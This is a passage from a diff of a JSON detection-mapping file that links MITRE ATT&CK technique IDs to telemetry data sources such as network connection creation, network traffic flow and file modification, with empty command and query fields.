"definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "bound to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to listen on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "listened on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + } + ], + "external_reference": [ + null + ] + }, + { + "technique_id": "T1601.002", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ] + ] + }, + { + "technique_id": "T1601.001", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ] + ] + }, + { + "technique_id": "T1601", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ] + ] + }, + { + "technique_id": "T1600.002", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ] + ] + }, + { + "technique_id": "T1600.001", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ] + ] + }, + { + "technique_id": "T1600", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ] + ] + }, + { + "technique_id": "T1556.004", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ] + ] + }, + { + "technique_id": "T1599.001", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + 